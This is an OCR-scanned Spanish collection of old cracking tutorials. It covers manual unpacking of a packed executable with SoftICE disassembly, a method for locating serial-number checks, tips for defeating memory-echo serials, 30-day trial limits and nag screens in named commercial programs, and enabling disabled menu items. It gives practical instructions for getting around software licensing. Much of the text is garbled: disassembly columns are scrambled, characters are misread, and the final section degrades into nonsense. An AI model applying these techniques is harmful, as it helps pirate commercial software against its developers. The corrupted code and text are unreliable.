Con mis comentarios de arriba, cualquier tonto puede adivinar que los 3 CALLS magicos son el corazon de esta rutina de desempaque. Entonces, 
miremos dentro del primer CALL Magico. 


005B0051 80 BD 2F 9E 43 00 00 cmp byte ptr [00439E2F+ebpl, O 

005B0058 74 1D jz 005B0077 ; viendo en Softice, este salto es tomado 
005B0077 8D B5 26 9D 43 00 lea esi, [00439D26+ebp 

005B007D 83 3E 00 cmp [esi], 0 ; revisa las secciones comprimidas 

005B0080 OF 84 EE 00 00 00 Jz 005B0174 ; salta si no hay mas 

005B0086 8D 85 86 9D 43 00 lea eax, [00439D86+ebp] ; saca el offset de "kernel32.d11" 
005B008C 50 push eax 

005B008D FF 95 74 9E 43 00 call [00439E74+ebp] ; llama a GetModuleHandle 

005B0093 8B F8 mov edi, eax ; mueve el manejador de kernel32.dl1l a edi 
005B0095 8D 9D 93 9D 43 00 lea ebx, [00439D93+ebp] ; obtiene el offset de "VirtualAlloc" 
005B009B 53 push ebx 

005B009C 50 push eax 

005B009D FF 95 70 9E 43 00 call [00439E70+ebp] ; llama a GetProcAddress 

005B00A3 89 85 76 9D 43 00 mov [00439D76+ebp], eax ; guarda la dirección 

005B00A9 8D 9D AO 9D 43 00 lea ebx, [00439DA0+ebp] ; obtiene el offset de "VirtualFree" 
005BO0AF 53 push ebx 

005B00BO 57 push edi 

005B0O0B1 FF 95 70 9E 43 00 call 00439E70t+tebp] ; llama a GetProcAddress 

005B00B7 89 85 7A 9D 43 00 mov 00439D7A+ebp], eax ; guarda la dirección 

005B00BD 8D B5 26 9D 43 00 lea esi, [00439D26+ebp 

005B00C3 8B 46 04 mov eax, [esi+4] ; saca el TamañoVirtual de la sección 
005B00C6 6A 04 push 4 

005B00C8 68 00 10 00 00 push 1000 

005B00CD 50 push eax 

005BO0OCE 6A 00 push 0 

005B00D0O FF 95 76 9D 43 00 call 00439D76+ebp] ; llama a VirtualAlloc 

005B00D6 89 85 22 9D 43 00 mov 00439D22+ebp], eax 

005B00DC 56 push esi 

005B00DD 8B 1E mov ebx, [esil 

005BO0DF 03 9D 1E 9D 43 00 add ebx, [00439D1E+ebp] 

005B00E5 50 push eax 

005B00E6 53 push ebx 

005B00E7 E8 89 00 00 00 Call 005B0175 ; [desempaca las secciones al espacio asignado 
005BO0EC 83 C4 08 add esp, 8 ¿ por VirtualAlloc] 

005BO0EF 3B 46 04 cmp eax, [esi+4] ; es correcto el tamaño de los datos desempacados? 
005B00F2 74 O0B jz 005BO0OFF ; salta si sí 

005BO0FF 80 BD 09 9D 43 00 00 cmp [00439D09+ebp], O 

005B0106 75 39 jnz 005B0141 ; salto no tomado cuando es desempacada la ler sección 
005B0108 FE 85 09 9D 43 00 inc byte ptr [00439D09+ebp] 

005B010E 50 push eax 

005B010F 51 push ecx 

005B0110 56 push esi 

005B0111 53 push ebx 

005B0112 8B C38 mov ecx, eax 

005B0114 83 E9 05 sub ecx, 5 

005B0117 8B B5 22 9D 43 00 mov esi, [00439D22+ebp] 

005B011D 33 DB xor ebx, ebx 

005B011F or ecx, ecx ¿ [las linea de 005B011F a 005B013B 

005B0121 74 1A Jz 005B013D ; hacen mas calculos 

005B0123 AC lodsb ¿ en la primer sección que 

005B0124 3C E8 cmp al, E8 ; está siendo desempacada] 

005B0126 74 08 Jjz 005B0130 

005B0128 3C E9 cmp al, E9 


005B012A 
005B012C 
005B012D 
005B012E 
005B0130 
005B0132 
005B0135 
005B0138 


005B013B 


005B013D 
005B013E 
005B013F 
005B0140 
005B0141 
005B0143 
005B0145 
005B014B 
005B0151 
005B0153 
005B0154 
005BO15A 
005B015F 
005B0161 
005B0162 
005B0168 
005B016B 
005B016E 
005B0174 


04 


05 
04 
05 


1E 
22 


22 
80 


7A 
08 
00 
4F 


9D 
9D 


9D 
00 


9D 


EF 


43 
43 


43 
00 


43 


FF 


00 
00 


00 


00 


FF 


Jz 
inc 
dec 
jmp 
sub 
add 
add 
sub 
jmp 
pop 
pop 
pop 
pop 
mov 
mov 
add 
mov 
repe movsb 
pop 
mov 
push 
push 
push 
Call 
add 
cmp 
jnz 
retn 


005B0130 

ebx 

ecx 

005B011F 

[esi], ebx 

ebx, 5 

esi, 4 

ecx, 5 

005B011F 

ebx 

esi 

ecx 

eax 

ecx, eax 

edi, [esi] 

edi, [00439D1E+ebpl] 

esi, [00439D22+ebpl] 

; copia datos desempacados al espacio del exe 
esi 

eax, [00439D22+ebpl] 

8000 

0 

eax 

[00439D7A+ebp] ; llama a VirtualFree 
esi, 8 

[esi], 0 ; mas secciones a desempacar? 
005B00C3 ; salta si hay 


Larga, pero franca sección de código. Primero, las direcciones para funciones VirtualAlloc y VirtualFree son recuperadas desde la función 
GetProcAddress. Entonces, el programa asigna una porción de memoria de un area especifica de memoria en su propia dirección por una llamada a 
VirtualAlloc, entonces la sección empacada en esta dirección. Si esta sección es la primera, mas calculos son hechos para el. Después, los datos 
desempacados son movidos a la dirección actual del exe, y luego la nueva dirección es liberada por una llamada a VirtualFree. Esta rutina hace un loop 4 
veces para las 4 secciones empacadas, que son CODE, DATA, .idata y .rsrc si estás usando PowerStrip como objetivo. Los nombres de las secciones 
son obtenidos al ver el titulo de la ventana de código de Softice cuando las secciones desempacadas son movidas en la línea 005B0151. 


Luego, miremos en el segundo CALL Mágico. 


005B02AC 
005B02B2 
005B02B8 
005B02BA 


005B0331 


8B 
8B 
2B 
74 


Cc3 


95 1E 9D 43 00 
85 OE 9D 43 00 


DO 
75 


mov 
mov 
sub 
Jz 


retn 


edx, [00439D1E+ebp] ; dirección del image base actual 

eax, [00439D0E+ebp] ; image base del exe antes del empacado 
edx, eax ; los compara 

005B0331 ; salta si son iguales 


Este segundo Call Mágico me rompió la cabeza por un momento. El image base especificado en el encabezado PE es solo la dirección PREFERIDA 
de la carga. Esto es, el cargador PE puede cargar el archivo donde quiera que sea necesario. Esta llamada revisa si el image base actual es el mismo 
que el preferido. Si no lo es, según yo, es que lo relocalizará. Pero esto le pasaría normalmente a un dll. 


005B0348 
005B034E 
005B0354 
005B035A 
005B035C 
005B0O35E 
005B0361 
005B0363 
005B0369 
005B036B 
005B036D 
005B036E 
005B0374 
005B0376 


005B0O3DF 
005BO3E5 
005BO3EF 
005BO3F5 
005B03F7 
005BO3F9 
005BO3FB 
0O5BO3FE 


8B 
8B 
8B 
03 
03 
8B 
85 
0F 
03 
8B 
50 
FF 
85 
75 


89 
c7 
8B 
8B 
85 
75 
8B 
03 


95 
B5 
BD 
F2 
FA 
46 
(elo) 
84 
Cc2 
D8 


95 
(elo) 
67 


85 
85 
95 
06 
(elo) 
03 
46 
Cc2 


1E 
27 
23 


oc 


F6 


74 


1F 
2B 
1E 


10 


9D 
9E 
9E 


00 


9E 


9E 
9E 
9D 


43 
43 
43 


00 


43 


43 
43 
43 


00 
00 
00 


00 


00 


00 
00 
00 


mov 
mov 
mov 
add 
add 
mov 
test 
Jz 
add 
mov 
push 
Call 
test 
jnz 


mov 

00+mov 
mov 
mov 
test 
jnz 
mov 
add 


edx, [00439D1E+ebp] ; Image base 

esi, 00439E27+ebp] 

edi, [00439E23+ebpl] 

esi, edx 

edi, edx 

eax, [esi+0C] 

eax, eax 

005B045F 

eax, edx ; obtiene el offset del nombre de la dll 
ebx, eax 

eax 

[00439E7E+ebp] ; llama a GetModuleHandle 
eax, eax ¡¿ prueba si la llamada fue exitosa 
005B03DF ; salta si sí 


[00439E1F+ebp], eax ; guarda el manejador 
[00439E2B+ebp]1, 0 

edx, [00439D1E+ebpl] 

eax, [esi] 

eax, eax 

005BO3FE 

eax, [esi+10] 

eax, edx 


005B0400 03 8 
005B0406 8B 1 
005B0408 8B 7 
005B040B 03 F 
005B040D 03 B 


2B 


10 


D 2B 


005B0413 85 DB 
005B0415 74 3A 
005B0417 F7 C3 00 
005B041D 75 04 
005B041F 03 DA 


005B0421 43 
005B0422 43 
005B0423 81 E3 FF 
005B0429 53 
005B042A FF B5 1F 


005B0430 FF 95 70 
005B0436 85 CO 
005B0438 75 0C 


005B0446 89 07 
005B0448 83 85 2B 


005B044F EB 9E 


005B0451 83 C6 14 
005B0454 8B 95 1E 
005B045A E9 FF FE 
005B045F C3 


9E 


9E 


00 


FF 


9E 


9E 


9E 


9D 
FF 


43 


43 


00 


EF 


43 


43 


43 


43 
FF 


00 


00 


80 


TE 


00 
00 


00 


00 


04 


add 
mov 
mov 
add 
add 
test 
2 
test 
jnz 
add 
inc 
inc 
and 
push 
push 
Call 
test 
jnz 


mov 
add 
jmp 
add 
mov 
jmp 
retn 


eax, 
ebx, 
edi, 
edi, e 
edi, 
ebx, e 
005B04 


004391 
eax] 


E2B+ebp] 


esi+10h] 


dx 
004391 
bx 
51 


E2B+ebpl] ; Apunta a la Tabla de Importación 


ebx, 80000000h 


005B04 
ebx, e 
ebx 
ebx 


23 
ax 


ebx, TEFFFFEFh 
apunta al nombre de una función dll 


ebx ; 

[00439 
[00439 
eax, e 
005B04 


[edi] , 
[00439 
005B03 
esi, 1 
edx, l 
005B03 


ElF+ebp] 
E70+ebpl ; llama a GetProcAddress 


ax ¡ fue exitosa la llamada? 
46 ; salta si sí 


eax ; guarda la dirección de la función en la Tabla de Importación 


EF 
4h 


5E 


E2B+ebpl, 4 


00439D1E+ebp] 


De aquí, podemos ver que este terecer CALL Mágico actualmente se comporta como el cargador de la DLL. Y de la definición de la Tabla de 
Importación de abajo, podemos concluir que solo volcaremos las secciones resultantes del primer CALL Mágico. Ahora, concentremonos en que 
necesitamos saber antes de volcar las secciones, esto es, el archivo PE. 


Primero aprenderemos acerca de los encabezados de secciones. Carga Procdump y usa la función PE Editor, mira las secciones de tu objetivo. 
Deberías ver algo como esto. Estoy usando Pstrip.exe como ejemplo. 


Nombre Tamaño Virtual Offset Virtual 


Raw Size 


Raw 


Offset Caracteristicas 


00000400 C0000040 
0004B600 C0000040 
0004D000 C0000040 
0004D000 Cc0000040 
0004E000 Cc0000040 
0004E000 C0000040 
0004E200 C0000040 
0004E200 C0000040 
00072000 C0000040 


000CB000 
00002000 
00005000 
00003000 
00001000 
00001000 
0000D000 
000CB000 
00002000 


00001000 
000CC000 
000CE000 
000D3000 
000D6000 
000D7000 
000D8000 
000E5000 
001B0000 


0004B200 
00001A00 
00000000 
00001000 
00000000 
00000200 
00000000 
00024000 
00001400 


Como podemos ver aquí, hay 9 secciones aquí. Cada sección consiste de un encabezado y un cuerpo (los datos raw en el exe). La sección tabla tiene 
una longitud de 40 bytes, y está definido como sigue en el archivo WINNT.H 


tidefine IMAGE_SIZEOF_SHORT_NAME 8 


typedef struct _IMAGE_SECTION_HEADER ( 


UCHAR Name [IMAGE_SIZEOF_SHORT_NAME]; 


union ( 


ULONG 
ULONG 


Misc; 


) IMAG] 


E, 


1) 


PhysicalAddress; 


VirtualSize; 


LONG VirtualAddress; 

LONG SizeOfRawData; 

LONG PointerToRawData; 
LONG PointerToRelocations; 
LONG PointerToLineNumbers; 
USHORT NumberOfRelocations; 
USHORT NumberOfLinenumbers; 
LONG Characteristics; 
ECTION_HEADER, 


*PIMAGE_SECTION_HEADER; 


Solo tocare las partes importantes que necesitas saber para nuestro trabajo de volcado. Name es un campo de 8 bytes almacenando el nombre de 
nuestras secciones, por ejemplo CODE, DATA, .idata y .rsrc. VirtualSize es el tamaño de esta seccion cuando el exe es asociado en memoria cuando se 
carga. VirtualAddress (abreviatura, VA) es la dirección inicial de la sección cuando es asociada en memoria. SizeOfRawData es el tamaño fisico de la 
sección en el exe. PointerToRawData es el offset de la sección en el exe. 


Antes de continuar, creemos un indice de que debemos hacer para nuestro proceso de volcado del exe. 


1. Juntar información vital de nuestro exe para nuestro porceso y tambien activar nuestro exe para correr despues de ser creado. La información es 
el nuevo Punto de Entrada para nuestro exe (ya explicado), nombres de las secciones que queremos volcar (ya explicado), Virtual Sizes 
(tamaños virtuales) y Virtual Addresses (direcciones virtuales) de las secciones que queremos volcar (usando Procdump), Offsets Raw y 
Tamaños Raw de CADA sección en el exe (usando Procdump también) y la nueva dirección de nuestra Tabla de Importación. 

2. Comenzar a volcar las secciones, usando los Tamaños Virtuales y Relative Virtual Addresses (Direcciones Virtuales Relativas) para cada 
sección. Relative Virtual Address es la suma del Image Base (400000 para Pstrip.exe) y VA. 

3. Poner las secciones juntas usando un buen hexeditor que permita copiar y pegar en hex, comenzando desde el encabezado PE, siguiendo por 
las secciones en orden corrcto. Ultraedit provee estás funciones. 

4. Modificar el encabezado PE para reflejar el nuevo Punto de Entrada, tabla de importación, offsets raw y tamaños raw del nuevo exe. Esto puede 
ser hecho facilmente usando procdump, o quiza quieras leer mas acerca del encabezado PE y modificarlos tu mismo con un hexeditor. 


Ahora, puedes comenzar a reunir la información que queremos para nuestro proceso de volcado. Solo necesitaras saber que secciones volcar (ya 
hicimos esto antes, esto es CODE, DATA, .idata y .rsrc), La Dirección Virtual Relativa (Relative Virtual Address, RVA para abreviar) de las secciones 
(esto es Image Base + VA) y el tamaño virtual (Virtual Size) de las secciones. Usando Procdump, facilmente podemos determinar estos valores que 
necesitamos. Así que comencemos a volcar las secciones en archivos usando la fantastica herramienta de Owl, Icedump (o si prefieres, la de Quine, 
Softdump) en diferentes archivos. El tamaño de cada secciones será el Virtual Size (Tamaño Virtual) de ella, y el RVA para las secciones será el Image 
Base (que es 400000) + VA. 


Siguiente, debemos 'pegar' estas secciones juntas usando las caracteristicas de copiado 4 pegado de Ultraedit. Pero, antes de esto, necesitamos 
saber algunas cosas más. Necesitaremos el Raw Size (Tamaño Crudo) y el Raw Offset (Desplazamiento bruto) de CADA sección. Con esta información, 
podemos encontrar donde pueden ser encontradas las secciones desempacadas en el exe, y cuales son sus tamaños. Esta información también puede 
ser encontrada usando Procdump. 


Ahora, comienza copiando el encabezado PE del exe empacado a un nuevo archivo hasta el Raw Offset de la primer sección, que es 400h para 
Pstrip.exe, en la sección CODE. Luego, copia la sección CODE volcada en este nuevo archivo, comenzando del offset 400h. Toma nota del nuevo Raw 
Size de esta sección, y el nuevo Raw Offset de la siguiente sección, que es DATA. Has lo mismo para todas las otras secciones. Recuerda tomar nota de 
los nuevos Raw Sizes y Raw Offsets para cada sección, luego reemplaza las viejas usando Procdump. ESTE PASO ES MUY IMPORTANTE. 


Ahora, modifica el encabezado PE para que refleje el nuevo Punto de Entrada y tabla de importación. El problema ahora es, que no sabemos donde 
está la tabla de importación. Afortunadamente, la solución es muy simple. Pero, necesitamos saber como está estructurado el directorio de importación. 
Por Favor toma nota de que los valores de entrada de la Tabla de Importación está apuntando a la estructura VA del Directoria de Importación. Aquí está 
la estructura del Directorio de Importación, como es dado por Randy Kath del Grupo de Tecnologia de Desarrollo de Redes de Microsoft. 


typedef struct taglmportDirectory 
Í 


DWORD dwRVAFunctionNamelList; 
DWORD dwUselessl1; 

DWORD dwUseless2; 

DWORD dwRVAModuleName; 

DWORD dwRVAFunctionAddressList; 


)IMAGE_IMPORT_MODULE_DIRECTORY, 
* PIMAGE_IMPORT_MODULE_DIRECTORY; 


No explicaré que siginifican los campos, ya que es muy obvio debido a sus nombres. Aquí, solo hay 2 campos que juegan un role importante 
determinando las direcciones de las funciones, que son los 2 ultimos campos, dwRVAModuleName y dwRVAFunctionAddressList. dwRVAModuleName 
apunta al nombre de la dll a cargar, por ejemplo, kernel32.dll. El campo dwRVAFunctionAddressList apunta a un array de direcciones de funciones, y 
estas direcciones de funciones apuntan a los nombres de las funciones encontradas en la dll. Bien, no hay nombres ahora, pero a los ordinales de las 
funciones, que son los 2 bytes precediendo a los nombres de las funciones. Si hay pocas dlls siendo usadas, entonces tendrás tantas estructuras 
taglmportDirectory. Como mencioné antes, el valor de la Tabla de Importacióndebería apuntar a la primer estructura. Pero donde está la estructura?? Con 
la información que te he dado arriba, estoy seguro que serás capaz de pensar en una forma de encontrarla por ti mismo. ;-). 


Despues de hacer estas modificaciones, graba tu nuevo exe, manten los dedos crusados, ora mucho, y ejecutalo. ;-) Si has hecho las modificaciones 
al archivo PE correctamente, deberías ser capaz de ejecutar el exe y cuando lo desensambles, el desensamblador debería ser capaz de localizar los 


nombres de las funciones tambien. 
Ñ NOTAS FINALES | 


En mi opinion, la habilidad del desempacado manual debería ser dominada por todo cracker, en lugar de depender de desempacadores, tanto 
genericos como especificos, para desempacar exe's o dll's. Esto se debe a que hay muchos tipos de empacadores de la misma versión y esto puede 
engañar al desempacador muy facilmente. Actualmente me inspire en el metodo 'restauración de la virginidad' de Marigold cuando leia sus ensayos sobre 
los esquemas de protección VBox. 


También, este metodo pede ser usado generalmente con encriptadores también, no es limitado para los desempacadores. 


| DEFINICIONES 


ImageBase. Dirección Base preferida en el espacio de dirección de un proceso para trazar la imagen del ejecutable. 
Dirección del EP. Indica la ubicacion del punto de entrada para la aplicación. 
VirtualSize. Indica el tamaño de la sección cuando es trazada en memoria. 


Tabla de Importación. Una Tabla de direcciones que apunta a nombres de funciones dll. Esta tabla es reemplazada por direcciones de las funciones 
antes de cargar el exe en el Punto de Entrada. 


Secciones. Tiene el contenido del archivo, incluyendo código, datos, recursos, y otra información del ejecutable. 


Quién necesita este tutorial? 

Cracking newbies, especialmente softice newbies tratando de encontrar Números de Serie 
válidos y/o el lugar correcto para crackear/parchear. 

Qué necesitas? 

Un programa que muestre una nag screen cuando ingresas un S/N equivocado 

(pero debería trabajar tambien con nag screens "normales" con botones OK - 

Dialogos aka windows). 


> cut here------------=-=---=-------------(fart here) 


Llamo al procedimiento siguiente el método "Interrupción - Salida". 

Es una forma general de crackear programas con S/N y/o nag 

screens, en otras palabras: una aproximación sistematica para obtener lo que necesitas. 
Y pienso que es una buena alternativa para fijar un bpx en un serial ficticio. 

Algunos de ustedes pueden usarlo ya sin saberlo. Okas, acá vamos... 


Fase 1: Preparemonos para la toma. 

Lanza el programa que quieres crackear. Has aparecer el dialogo que 

pide el S/N. Despues de escribir un numero cualquiera, abre SoftICE 

y fija un breakpoint en una api la que quiera - bien, por supesto 

en una que es llamada ANTES de que aparezca la Ventana "Serial Incorrecto". 
Yo recomiendo HMEMCPY (trabaja muy a menudo). Ahora regresa al programa, 
da Enter. De nuevo en Softice (Espero)... 


Fase 2: Encontrando "la raíz del mal". 

Ahora estás al inicio de la llamada-api a la que le fijaste un breakpoint 

antes. Ahora desactivalo. Presiona F12 cuanto sea necesario para llegar al modo PROT32 
del programa. Okas, ahora fija un breakpoint en la dirección actual (ie. doble click en 

la ventana de código que muestra el código asm). 

Ahora viene una tarea repetitiva: F12 de nuevo, fija un nuevo breakpoint en 

la dirección actual, borra o desactiva el antiguo breakpoint. Repite esto 

hasta que aparezca la ventana de "Serial Incorrecto". 


Fase 3: "Entremos”. 

Okas, la nag screen apareció, pero con suerte has fijado un breakpoint 

antes de que esto ocurriera. Reingresa tu numero ficticio. Presiona Enter. 

Si todo trabaja bien, deberías regresa a SoftICE en el último 

breakpoint antes del "molesto Mensaje”. Comienza a rastrear 

con F10 (no FS). Cada vez que llegues a un "call" fijale un breakpoint, 

y camina dentro. Si la nag screen no aparece, borra o desactiva el 

breakpoint y continua rastreando (F10). En algún momento la 

nag screen aparecerá, pero no te preocupes, con suerte has fijado un 
breakpoint en la última llamada antes de la nag-screen. Ingresa tu +* de nuevo. 
Presiona Enter. De regreso a SoftICE (espero) en la última llamada antes de la 
nag screen. Camina dentro del call (F8). Borra o desactiva el 

breakpoint y rastrea con F10. Has lo mismo de arriba. En cada call 

fija un breakpoint, rastrea dentro o camina en ella, etc. (pienso que ya 
entendiste). Lo que haces es localizar la esencia del molesto mensaje 
caminando profundo y mas profundo en las llamadas y el código. En algún lugar en el centro está una llamada a api para SHOWWINDOW o MESSAGEBOX, etc...O: Puede ser una llamada a 


una "colección de llamadas a api" - mira las direcciones (empujadas) antes de las 
llamadas! podrías "ver" que desplegará o no el procedimiento. Todo lo que 
hicimos fue centrarnos en el "centro de la nag” sistematicamente y paso a paso. 


Fase 4: "Salgamos". 

Ahora que hemos encontrado el "nivel" exacto de procedimientos y subrutinas 
hacemos los pasos finales. Inspeccionar el código antes de la llamada a la 

(api) nag screen. Las oportunidades son buenas de encontrar un CMP en algún lugar 
entre el S/N correcto y el incorrecto. Dependiendo de este resultado, HHOWWINDOW 
(o algo) será o no ejecutado. Si piensas que encontraste el CMP correcto 

mira el código que es ejecutado cuando los s/n son iguales. También puede ser 

un SHOWWINDOW ...(pero esta vez con "thank you for registering” ;). 

Si no hay un CMP en este "nivel" debes dejar el procedimiento actual (F12) 

y ver en la siguiente (alta) "herarquia" (antes de la llamada de la cual saliste). 

Aún sin CMP? Repite lo de arriba hasta que encuentres uno bueno. (También 

puede ser un TEST). 


Fase 5: "Toma un respiro Profundo". 

Cuando tienes el CMP correcto frente a ti, puedes escribir la 

dirección del JZ/INZ (o lo que sea) para parchear despues o 

lees el S/N correcto (deberías preferir la siguiente). 

En algunos casos los S/N's son encriptados antes de ser comparado. 

Deberías tratar de encontrar la rutina de encriptación para obtener un S/N válido. 
Esta rutina probablemente es colocada muy cerca del 

CMP. (Mira las llamadas antes de la llamada al procedimiento de comparación). 


El resto depende de ti! 
Bien, espero que este tutorial te sea de ayuda, buena suerte! 


RevX 
Traductor: *[G]oLe[E]* goleeuvChotmail.com 


- Sugerencias para el principiante - qué debería buscar? - 


O 1997 por Cruehead / MiB 


Traducción de *[G]oLe[E]* 


Hola de nuevo wannabe-cracker! Estás sentado allí, pensando "Yeah - Ahora pienso que sé que significan todas esas palabras 
extrañas como CMP, JE, Softice y Wdasm, pero todavía no sé que estoy buscando ?". Si tu respuesta es sí, entonces lee, porque aquí 


describiré algunas cosas comunes para buscar cuando estas crackeando. Si tu respuesta es no, no gastes tu tiempo con esto - sal y 
comienza a crackear! 


Memory Echo - Una forma común de encontrar un serial válido es encontrar lo que el legendario +ORC llama memory echo. Esto es 
el lugar donde nuestro serial es comparado con el serial real valido, (a menudo calculado con nuestro username). Puedes crackear 
muchos programas, solo encontrando el memory echo, así que sospecha cuando veas algún código como este: 


mov bl, [esi] ¿Toma un byte del serial correcto 
mov bh, [edi] ¿Toma un byte de nuestro serial 

cmp bl,bh ¿Los compara 

jne ... ¿Si no casan, el serial es invalido. 


Entonces, para encontrar el memory echo aquí, escribirías, en SoftICE, ''d esi'', y luego verías el serial correcto en tu 
datawindow. 
Otro code snippet que hace lo mismo, podría verse así: 


mov ecx,lengthofvalidserial ¡Cuantos Bytes para comparar 
repz cmpsw ¡Compara las cadenas en ds:esi (serial correcto) 
con es:edi (nuestro serial) 
je... ¡Salta a la etiqueta "serial valido" si las cadenas casan. 


Para encontrar el memory echo para un programa que usa un código como este, escribirías, en SoftICE, 'd esi''. Justo como 
en el ejemplo anterior! Bien, por ahora, espero que entiendas un poco mas acerca de lo que es el memory echo, y como 
encontrarlo! 


Limite de 30 días - Muchos programas solo trabajan por cierto numero de días (principalmente 30 = 1 mes), pero aparte de este 
limite, el programa es totalmente funcional. Lo que haces en este caso, es encontrar donde se compara "el número de días usados" con 
"30", y modifica el código. Aquí está como se puede ver el código: 


mov ecx,1E ¡Mov lEhex (=30 dec) a ecx 

mov eax, [esp+10] ¡Mov número de días usados a eax 

cmp eax, ecx ¡Compara eax (número de días usados) con ecx (30) 

a E ¡Si eax es menor que 30 Podemos seguir evaluando el programa. 


Una forma simple de crackearlo sería cambiar ''mov eax,[esp+10]"', a '"mov eax,1'"' o algo así. Luego el programa siempre 
pensará que estamos en nuestro primer día de evaluación. Otra forma de crackearlo sería cambiando el salto condicional, a 
uno incondicional. 


Nagscreens - "This version of xxxxxxxx 1s shareware! Please register if you use it blah blah...". Reconoces esto??? Esto es lo que 
llamamos Nag screen! Algunas veces no hay lugar para el serial, o no hay tiempo límite, solo una nag screen, si pudieramos quitarla, 
tendriamos crackeado el programa. Entonces, lo que deberías estar buscando para algo como esto es: 


cmp byte ptr [00480EB9], 00 ¡Compar una flag (la flag registrada) en memoria con 0 
jne 004212F2 ¿Si es algo mas que cero, es una copia registrada, y no 
muestra la nagscreen 


Puedes crackear esto en muchas formas, la mas fácil sería solo cambiando "jne" a "jmp". 


Programas para usar como objetivo - Okas, ahora que sabes que buscar, probablemente quieres un objetivo fácil para practicar, 
correcto? 


Winzip 6.2 - Un buen objetivo newbie para el método memory echo. 
Ultraedit v5.00a - Un buen blanco para cracking de tiempo limite. 


Graphic Workshop 95 v1.1y - Un buen objetivo para remover nagscreens. 


Bueno - por ahora deberías tener al menos una pista sobre que buscar, pero recuerda que MUCHOS programas tienen por lo menos 
algo mas dificultoso en sus esquemas de protección, pero si lees y ENTIENDES este ensayo, pronto deberías ser capaz de crackearlos 
tambien! 


Algo que quieras preguntarme? Cruehead_O hotmail.com es mi email. 


[Bal Back to tutorial page. 


Copyright O MiB 1998. All rights reversed. 
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OUDUVVULUUUUOOL LU OVUUU LOU LUV UU OO LUOL UL LLL LUVLO 
Que onda amigos. He decidido escribir este tutorial/ensayo sobre activar items del menú simplemente porque recientemente aprendí acerca de la forma en que trabaja internamente esto y decidí escribir un poco. Porfa, empijamense conmigo, es la its 1:10 AM, y acabo de comenzar, despues de hacer mi tarea de mate.. blah. 
De cualquier manera, en este texto describiré algunos métodos usados para activar items del menú. Aunque probablemente existen otros métodos, estos son mi standard y los uso la mayor parte del tiempo, y actualmente, son suficientes para la mayoria de progs. 


La aproximación EnableMenultem 


¡Como muchos saben, la función API EnableMenultem es muy usada por aplicaciones para desactivar, activar o poner en gris las opciones de una aplicación, y esta llamada a API es un objetivo viable para nuestro poder de crackeo si queremos activar un item :) 
¡Como una nota, las aplicaciones pueden tener llamadas a otras APIS que manejan menús. 
Esas APÍS pueden ser: 


Modify Menu 
CheckMenultem 
ec. 


Así, basicamente cubriré EnableMenultem, pero recuerda siempre que existen otras opciones. No descartaría un intento de colocar un menú en tiempo de ejecución. Lo Que quiero decir con colocar un menú es que el menú está definido en la fuente del programa, pero el programa no lo genera o intencionalmente los borró con APIs como las listadas arriba, o DeleteMenu. 
Cubriremos el método básico para activar el item del menú usando EnableMenultem, porque la mayoria de programadores perezosos nunca usan una sofisticación en este tipo de "protección". 


Bien, describamos brevemente los parámetros de EnableMenultem. Esos parámetros son transferidos a la API usando instrucciones PUSH como todos saben, en orden inverso. 
Ejemplo: 


En C la llamada a EnableMenultem se vería como así: 


BOOL EnableMenultem (| 
HMENU hMenu 1 manejador del recurso de menú 
LINT ulDEnableltem — // item del menú a activar, desactivar o poner en gris 
UINTuEnable —— //Mags del ¡tem del menú. 
» 


En ASM, Estos son los PUSHes, pero en orden inverso: 
PUSH. uEnable 

PUSH. ulDEnableltem 

PUSH hMenu 

CALL [KERNEL32!EnableMenultem] 


Bueno, apuesto que ves la forma :) 
Basicamente este es el formato de la llamada, donde todos esos parametros son punteros. Si quieres revisar que está siendo dado a la API, desplegar los contenidos de memoria de cada uno de esos parámetros antes de que tome lugar el CALL, de esta forma verás si estás en el lugar correcto. 


Okas,asumamos por un segundo que desensamblamos el EXE y encontramos un lugar donde vemos la llamada ala API EnableMenuliem. Esta es la pate donde usualmente vemos alrededor, yu sea en a misma área de código o en la rutina que la llama, o donde sea hasta que encontramos un Sato condicional o algo que podamos modificar 
Ora aproximación a esto sería un BP en esta API con SICE. Puedes intentar capturndola desacivando el item y cambiando los valores en el are pero eo tiene oros problemas como explicaré mas adelante. 

La razón principal delos problemas sin embargo, es el hecho que no es suficiente activar el menú, tienes que activarla are del programa que revisa esa opción. Mas de eso luego, cuando explicaré una forma de actvar un tem usando mensajes en ventanas. 

Hasta ahora, os hemos aprodimado muy normalmente al problema. Digamos que tienes un menú que quieres activa, escribes BPX enablemenuite, Cuando aparece (slo hace hehe), retorna al ruina que la amó, entonces sugiere fijar un BP en los PUSHes antes del CALL, para qu la proxima vez veas que está siendo transferido. 
"También s posible rastrear una pocas instrucciones en el código de la API y ver que valore extra dela pla. Dicho código probablemente se vería como e siguiente sippet 


MOV EDL[ESP+04] 
MOV EAX[ESP+08] 


Lo que harán estas 2 instrucciones es tomar el valor de la última DWORD (32 bit) colocada en la pila, o los últimos 4 bytes si lo quieres, y ponerlos en EDI, luego los 4 bytes que fueron puestos antes de esos, en EAX. 


De cualquier forma, el modificar el valor puede llevarte a cualquier lado, pero no es suficiente porque aún hay una parte de programa que tiene que ejecutar algo cuando el item del menú es seleccionado. El hecho que ese item es seleccionable no significa que el programa lo ejecutará el código que el item supuestamente hace, a menos, por supuesto que encuentres donde es hecho esto. Una forma de encontrarlo es hacerlo. 
siguiente 


Ya que Windows desparcha un mensaje llamado WM_COMMAND o WM_SYSCOMMAND (si es un menú de sistema), al mensaje de cola del programa, puede fijar un BP en el mensaje de Win. 
Usa HWND para desplegar los manejadores de ventanas de la aplicación en la que quieres trabajar, luego escribe el siguiente comando: 
BMSG hwnd WM_COMMAND- 


Donde hwnd es el manejador de ventana que obtuviste antes. 
Esto fijará un BP cuando Windows envie CUALQUIER mensaje WM_COMMAND 4 CUALQUIER programa. Un mensaje WM_COMMAND es generado cada vez que el usuario hace click en un item de menú en un DialogBox o en un menú (cualquier tipo de menú). 


Ahora, cuando apareces en Sl, ve lo siguiente. Deberia imprimir el manejador de ventana, el IParam, wParam y más.. lo que nos interesa es la palabra baja (low word) wParam. Esa word tiene un valor que es asignado al item del menú es constante a través del programa. Usa esto como una referencia para ver donde es que actua la función EnableMenulter en este item de menú. Esto es lógico porque este es uno de los parámetros enviados a EnableMenultem cuando el programa los llama. 
par ia pr y y q y q ia prog pi q gico porq pará prog 


